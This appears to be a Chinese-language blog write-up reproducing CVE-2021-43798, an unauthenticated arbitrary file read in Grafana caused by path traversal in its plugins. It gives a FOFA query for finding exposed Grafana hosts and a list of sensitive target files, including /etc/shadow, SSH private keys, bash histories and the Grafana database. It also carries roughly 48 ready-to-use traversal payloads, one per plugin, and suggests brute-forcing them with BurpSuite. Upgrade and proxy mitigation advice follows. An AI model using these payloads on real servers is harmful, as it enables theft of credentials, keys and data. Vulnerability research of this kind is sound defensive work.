CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞
CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞
目录
漏洞原理
漏洞信息
受影响版本
FOFA搜集相关资产
漏洞分析&漏洞复现
解决方案
漏洞原理
漏洞信息
受影响版本
FOFA搜集相关资产
app="Grafana"
漏洞分析&漏洞复现
读取敏感文件复现poc
/public/plugins/alertlist/../../../../../../../../etc/passwd
读取数据库文件
读取配置文件
还可以读取的其他文件
/conf/defaults.ini
/etc/grafana/grafana.ini
/etc/passwd
/etc/shadow
/home/grafana/.bash_history
/home/grafana/.ssh/id_rsa
/root/.bash_history
/root/.ssh/id_rsa
/usr/local/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/proc/net/fib_trie
/proc/net/tcp
/proc/self/cmdline
该漏洞由于Grafana Plugins引发的目录穿越漏洞导致任意文件读取,上述截图仅展示了grafana-clock-panel插件的效果。官方公布的受影响Plugins为40个。
/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd
因为受影响的插件太多,所以建议使用BurpSuite工具爆破一波
解决方案
v8.0.0-beta1 和 v8.3.0 之间的所有安装都应尽快升级。
如果无法升级,在 Grafana 前运行反向代理来规范化请求的 PATH 将缓解该漏洞。例如,envoy 中的normalize_path设置。
得益于我们的深度防御方法,Grafana Cloud实例并未受到该漏洞的影响。
与往常一样,我们与所有许可提供 Grafana Pro 的云提供商密切协调。他们已收到禁运的早期通知,并确认他们的产品在本公告发布时是安全的。按字母顺序,这适用于 Amazon Managed Grafana 和 Azure Managed Grafana。
本文参考:GitHub - jas502n/Grafana-CVE-2021-43798: Grafana Unauthorized arbitrary file reading vulnerability
CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞相关推荐
- Grafana 中存在严重的未授权任意文件读取漏洞,已遭利用
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798),CVS ...
- Grafana 任意文件读取漏洞复现
一.漏洞描述 Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件 二.漏洞影响 Grafana 8.x 三.漏洞复现 可以从登陆页面看到版本信息为 v8.2. ...
- 记一次小米路由器任意文件读取漏洞
文章目录 前言 一.漏洞发现 二.漏洞挖掘 1.简单的爆破 2.文件读取 三.漏洞利用 总结 前言 任意文件读取漏洞,是web安全里高危的漏洞,它可以泄露源码.数据库配置文件等等,导致网站处于极度不安 ...
- CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)
漏洞描述 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在 ...
- 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
漏洞描述 用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件 漏洞影响 用友 畅捷通T+ 网络测绘 app="畅捷通-T ...
- 安全研究 | Jenkins 任意文件读取漏洞分析
欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一.漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 ...
- Apache Solr任意文件读取漏洞复现
Apache Solr任意文件读取漏洞复现 一.简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口.用户可以通过http请求,向搜索引擎服务器提交一定格 ...
- CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)
CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452) 一.漏洞描述: Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Fir ...
- 7天学习Go语言-尾声+一次险些翻车的任意文件读取漏洞小记
接口 接口的定义 接口(interface )类型是对其他类型行为的概括和抽象,接口类型定义了一组方法,但是不包括这些方法的具体实现 接口本质是一种指针类型,可以实现多态功能.如果一个类型实现了某个接 ...
最新文章
- 444牛X的日常口语
- mysql fabric c .net_MySQL Fabric [01] 简介
- 举例详细说明javascript作用域、闭包原理以及性能问题(转)
- PHP源码之数组的内部实现
- asp.net发送邮件
- 使用代理下载Unity AssetStore上资源的方法
- apt-get install php5-redis,Ubuntu安装redis和php5-redis扩展
- java 扇形_使用js画图之圆、弧、扇形
- MySQL 开启二进制日志记录
- 无人机图像的目标检测的学习
- VBA连接MySQL数据库以及ODBC的配置(ODBC版本和MySQL版本如果不匹配会出现驱动和应用程序的错误)...
- qtcpsocket断开_Qt QTcpSocket 对连接服务器中断的不同情况进行判定
- 将全部视频画面水平或者垂直翻转的实例教程分享
- 【Python PIL】用PIL绘制中国象棋棋盘
- TIA Protal 精智面板中的动画外观
- selenium防爬无头浏览器和模拟手机浏览器
- 监控记录交换机端口流量及性能,MSRM3一分钟搞定
- 深度学习在美团配送ETA预估中的探索与实践-笔记
- 语音合成学习(一)综述
- Android 实现一键反混淆功能